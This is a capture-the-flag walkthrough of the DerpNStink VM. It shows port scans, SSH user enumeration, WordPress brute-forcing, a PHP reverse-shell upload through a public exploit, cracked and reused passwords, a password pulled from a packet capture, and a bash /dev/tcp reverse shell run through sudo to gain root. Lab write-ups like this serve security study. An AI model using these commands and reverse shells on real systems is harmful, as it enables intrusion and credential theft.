DerpNStink: 1 walkthrough

Walkthrough of DerpNstink: 1

Enumeration:

root@kali:~# nmap -sT -A -sV –version-intensity 6 -p- 192.168.31.149

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp open http Apache ht
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-title: DeRPnStiNK

Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nothing from the FTP server:

root@kali:~# nmap –script=*ftp* –script-args=unsafe=1 -p 20,21 192.168.31.149

Starting Nmap 7.50 ( https://nmap.org ) at 2018-03-06 06:35 EST
Nmap scan report for 192.168.31.149
Host is up (0.00031s latency).

PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 11315 guesses in 600 seconds, average tps: 18.7

Using metasploit we search for SSH users:

[+] 192.168.31.149:22 – SSH – User ‘gopher’ found
[+] 192.168.31.149:22 – SSH – User ‘kernoops’ found
[+] 192.168.31.149:22 – SSH – User ‘libuuid’ found
[+] 192.168.31.149:22 – SSH – User ‘list’ found
[+] 192.168.31.149:22 – SSH – User ‘listen’ found
[+] 192.168.31.149:22 – SSH – User ‘lp’ found
[+] 192.168.31.149:22 – SSH – User ‘man’ found
[+] 192.168.31.149:22 – SSH – User ‘mountfsys’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody4’ found
[+] 192.168.31.149:22 – SSH – User ‘nuucp’ found
[+] 192.168.31.149:22 – SSH – User ‘sync’ found
[+] 192.168.31.149:22 – SSH – User ‘web’ found
[+] 192.168.31.149:22 – SSH – User ‘webmaster’ found
[+] 192.168.31.149:22 – SSH – User ‘zabbix’ found

Using searchsplotit we find an OpenSSH vulnerability that might help identify SSH users:

python ./40136.py 192.168.31.149 -U /usr/share/wordlists/metasploit/unix_users.txt -e –trials 5 –bytes 10

User name enumeration against SSH daemons affected by CVE-2016-6210
Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari

[*] Testing SSHD at: 192.168.31.149:22, Banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
[*] Getting baseline timing for authenticating non-existing users…………
[*] Baseline mean for host 192.168.31.149 is 0.0631635 seconds.
[*] Baseline variation for host 192.168.31.149 is 0.0109688798904 seconds.
[*] Defining timing of x < 0.0960701396712 as non-existing user.
[*] Testing your users…
[+] rfindd – timing: 0.110398
[+] root – timing: 0.1100708

[+] 192.168.31.149:22 – SSH – User ‘gopher’ found
[[+] 192.168.31.149:22 – SSH – User ‘kernoops’ found
[+] 192.168.31.149:22 – SSH – User ‘libuuid’ found
[+] 192.168.31.149:22 – SSH – User ‘list’ found
[+] 192.168.31.149:22 – SSH – User ‘listen’ found
[+] 192.168.31.149:22 – SSH – User ‘lp’ found
[+] 192.168.31.149:22 – SSH – User ‘man’ found
[+] 192.168.31.149:22 – SSH – User ‘mountfsys’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody4’ found
[+] 192.168.31.149:22 – SSH – User ‘nuucp’ found
[+] 192.168.31.149:22 – SSH – User ‘sync’ found
[+] 192.168.31.149:22 – SSH – User ‘web’ found
[+] 192.168.31.149:22 – SSH – User ‘webmaster’ found
[+] 192.168.31.149:22 – SSH – User ‘zabbix’ found

dirb finds us some interesting results:

—- Entering directory: http://192.168.31.149/php/ —-
==> DIRECTORY: http://192.168.31.149/php/phpmyadmin/
—- Entering directory: http://192.168.31.149/temporary/ —-
—- Entering directory: http://192.168.31.149/weblog/ —-
==> DIRECTORY: http://192.168.31.149/weblog/wp-admin/

I can’t seem to find the phpmyadmin version, but I do find out the PHP version, which is PHP/5.5.9-1ubuntu4.22. This might actually help at some point.

Using a longer wordlist we find http://192.168.31.149/webnotes, which offers some clues:

We try to login via SSH, but we get trolled:

Aanother dirb result catches our attention.

http://192.168.31.149/weblog/

This redirects to http://derpnstink.local/weblog/ which we cannot view, because of DNS resolution fail. So we add the following to our /etc/hosts file:

root@kali:~/Desktop/AUTOMATED_actions# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

# stuff
192.168.31.149 derpnstink.local
192.168.31.149 www.derpnstink.local
root@kali:~/Desktop/AUTOMATED_actions#

Now we can access the page and it’s an obvious WordPress, so we fire wpscan to bruteforce some users:

wpscan –url http://derpnstink.local/weblog/ –wordlist /usr/share/wordlists/dirb/big.txt –threads 2

Brute Forcing ‘admin’ Time: 00:00:43 <========== > (1815 / 20470) 8.86% ETA: 00:07:28
+—-+————-+———————————+———-+
| Id | Login | Name | Password |
+—-+————-+———————————+———-+
| 1 | unclestinky | 404 Not | |
| 2 | admin | admin – DeRPnStiNK Professional | admin |
+—-+————-+———————————+———-+

[+] Finished: Tue Mar 6 09:05:20 2018
[+] Requests Done: 22656

wpscan also finds some vulnerabilities:

We download and run https://www.exploit-db.com/exploits/34681/

I copy a PHP reverse shell and run a netcat listener

cp /usr/share/webshells/php/php-reverse-shell.php ./

nc -lvvp 777

I edit the shell with my IP and port and run the 34681.py exploit.

python ./34681.py -t http://derpnstink.local/weblog/ -f ./php-reverse-shell.php -u admin -p admin

We have a limited shell:

Beautify the shell:

1 echo $SHELL
2 export TERM=xterm-256color
3 export SHELL=BASH
4 stty rows 55 columns 205
5 reset

We find some users in /etc/passwd

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
stinky:x:1001:1001:Uncle Stinky,,,:/home/stinky:/bin/bash
mrderp:x:1000:1000:Mr. Derp,,,:/home/mrderp:/bin/bash

In /var/www/html/weblog we find the SQL user and pass:

** The name of the database for WordPress */
define(‘DB_NAME’, ‘wordpress’);

/** MySQL database username */
define(‘DB_USER’, ‘root’);

/** MySQL database password */
define(‘DB_PASSWORD’, ‘mysql’);

Login to Mysql server:

mysql -uroot -pmysql

mysql> SELECT * FROM wp_users;
SELECT * FROM wp_users;
+—-+————-+————————————+—————+——————————+———-+———————+———————————————–+————-+————–+——-+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | flag2 |
+—-+————-+————————————+—————+——————————+———-+———————+———————————————–+————-+————–+——-+
| 1 | unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 | unclestinky | unclestinky@DeRPnStiNK.local | | 2017-11-12 03:25:32 | 1510544888:$P$BQbCmzW/ICRqb1hU96nIVUFOlNMKJM1 | 0 | unclestinky | |
| 2 | admin | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ | admin | admin@derpnstink.local | | 2017-11-13 04:29:35 | | 0 | admin | |
+—-+————-+————————————+—————+——————————+———-+———————+———————————————–+————-+————–+——-+
2 rows in set (0.00 sec)

mysql>

Using hashcat I recover the following passwords for wordpress:

9b776afb479b31e8047026f1185e952dd1e530cb:wedgie57

 

We found the 1st flag by logging in wordpress with unclestinky

http://derpnstink.local/weblog/?p=8&preview=true

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

Clue in /support:

www-data@DeRPnStiNK:/support$ cat troubleshooting.txt
cat troubleshooting.txt
*******************************************************************
On one particular machine I often need to run sudo commands every now and then. I am fine with entering password on sudo in most of the cases.

However i dont want to specify each command to allow

How can I exclude these commands from password protection to sudo?

********************************************************************

********************************************************************
Thank you for contacting the Client Support team. This message is to confirm that we have resolved and closed your ticket.

Please contact the Client Support team at https://pastebin.com/RzK9WfGw if you have any further questions or issues.

Thank you for using our product.

********************************************************************

The pastebin page says:

mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

It seems that we need to privesc to user mrderp to execute commands as sudo.

We go to /home

www-data@DeRPnStiNK:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Nov 12 12:54 .
drwxr-xr-x 23 root root 4.0K Nov 12 13:39 ..
drwx—— 10 mrderp mrderp 4.0K Jan 9 12:15 mrderp
drwx—— 12 stinky stinky 4.0K Jan 9 12:14 stinky

Password reuse ?

su stinky
Password: wedgie57

Works!!

We cannot seem to sudo with stinky

stinky@DeRPnStiNK:/home$ sudo su -l
sudo su -l
[sudo] password for stinky: wedgie57

stinky is not in the sudoers file. This incident will be reported.
stinky@DeRPnStiNK:/home$

Found several ssh private keys, none helped.

 

Hint:

stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are…
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
stinky@DeRPnStiNK:~/ftp/files/network-logs$ ls -a
ls -a
. .. derpissues.txt
stinky@DeRPnStiNK:~/ftp/files/network-logs$ pwd
pwd
/home/stinky/ftp/files/network-logs
stinky@DeRPnStiNK:~/ftp/files/network-logs$

Can’t use that because of permissions for tcpump, but we do find a pcap file in /home/stinky/Documents

We read it and search for papss in the txt file:

stinky@DeRPnStiNK:~/Documents$ tcpdump -qns 0 -X -r ./derpissues.pcap >> ./derpissues.txt
<ts$ tcpdump -qns 0 -X -r ./derpissues.pcap >> ./derpissues.txt
reading from file ./derpissues.pcap, link-type LINUX_SLL (Linux cooked)
stinky@DeRPnStiNK:~/Documents$ grep -i pass ./derpissues.txt
grep -i pass ./derpissues.txt
0x0400: 3034 3032 6166 3626 5f77 705f 6874 7470 0402af6&_wp_http
0x0410: 5f72 6566 6572 6572 3d25 3246 7765 626c _referer=%2Fwebl
0x0420: 6f67 2532 4677 702d 6164 6d69 6e25 3246 og%2Fwp-admin%2F
0x0430: 7573 6572 2d6e 6577 2e70 6870 2675 7365 user-new.php&use
0x0440: 725f 6c6f 6769 6e3d 6d72 6465 7270 2665 r_login=mrderp&e
0x0450: 6d61 696c 3d6d 7264 6572 7025 3430 6465 mail=mrderp%40de
0x0460: 7270 6e73 7469 6e6b 2e6c 6f63 616c 2666 rpnstink.local&f
0x0470: 6972 7374 5f6e 616d 653d 6d72 266c 6173 irst_name=mr&las
0x0480: 745f 6e61 6d65 3d64 6572 7026 7572 6c3d t_name=derp&url=
0x0490: 2532 4668 6f6d 6525 3246 6d72 6465 7270 %2Fhome%2Fmrderp
0x04a0: 2670 6173 7331 3d64 6572 7064 6572 7064 &pass1=derpderpd
0x04b0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04c0: 6572 7026 7061 7373 312d 7465 7874 3d64 erp&pass1-text=d
0x04d0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04e0: 6572 7064 6572 7064 6572 7026 7061 7373 erpderpderp&pass
0x04f0: 323d 6465 7270 6465 7270 6465 7270 6465 2=derpderpderpde
0x0500: 7270 6465 7270 6465 7270 6465 7270 2670 rpderpderpderp&p
0x0510: 775f 7765 616b 3d6f 6e26 726f 6c65 3d61 w_weak=on&role=a
0x0520: 646d 696e 6973 7472 6174 6f72 2663 7265 dministrator&cre
0x0530: 6174 6575 7365 723d 4164 642b 4e65 772b ateuser=Add+New+
0x0540: 5573 6572 User

We got the password:

stinky@DeRPnStiNK:~/Documents$ su mrderp
su mrderp
Password: derpderpderpderpderpderpderp

mrderp@DeRPnStiNK:/home/stinky/Documents$ id
id
uid=1000(mrderp) gid=1000(mrderp) groups=1000(mrderp)
mrderp@DeRPnStiNK:/home/stinky/Documents$

 

Flag 3 found:

stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
stinky@DeRPnStiNK:~/Desktop$

 

mrderp@DeRPnStiNK:~/Downloads$ sudo -l
sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp

Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:~/Downloads$

We create derpy.sh and add an nc reverse shell command, start the listener on localmachine:

mrderp@DeRPnStiNK:~/binaries$ echo ‘#!/bin/bash’ >> derpy.sh
echo ‘#!/bin/bash’ >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ echo ‘bash -i >& /dev/tcp/192.168.31.139/888 0>&1′ >> derpy.sh
>> derpy.shi >& /dev/tcp/192.168.31.139/888 0>&1’
mrderp@DeRPnStiNK:~/binaries$ cat derpy.sh
cat derpy.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.31.139/888 0>&1
mrderp@DeRPnStiNK:~/binaries$ chmod 777 derpy.sh
chmod 777 derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
sudo ./derpy.sh
[sudo] password for mrderp: derpderpderpderpderpderpderp

Got root ?

The flag:

root@DeRPnStiNK:/root/Desktop# cat flag.txt
cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo

root@DeRPnStiNK:/root/Desktop#

Leave a Reply

Your email address will not be published.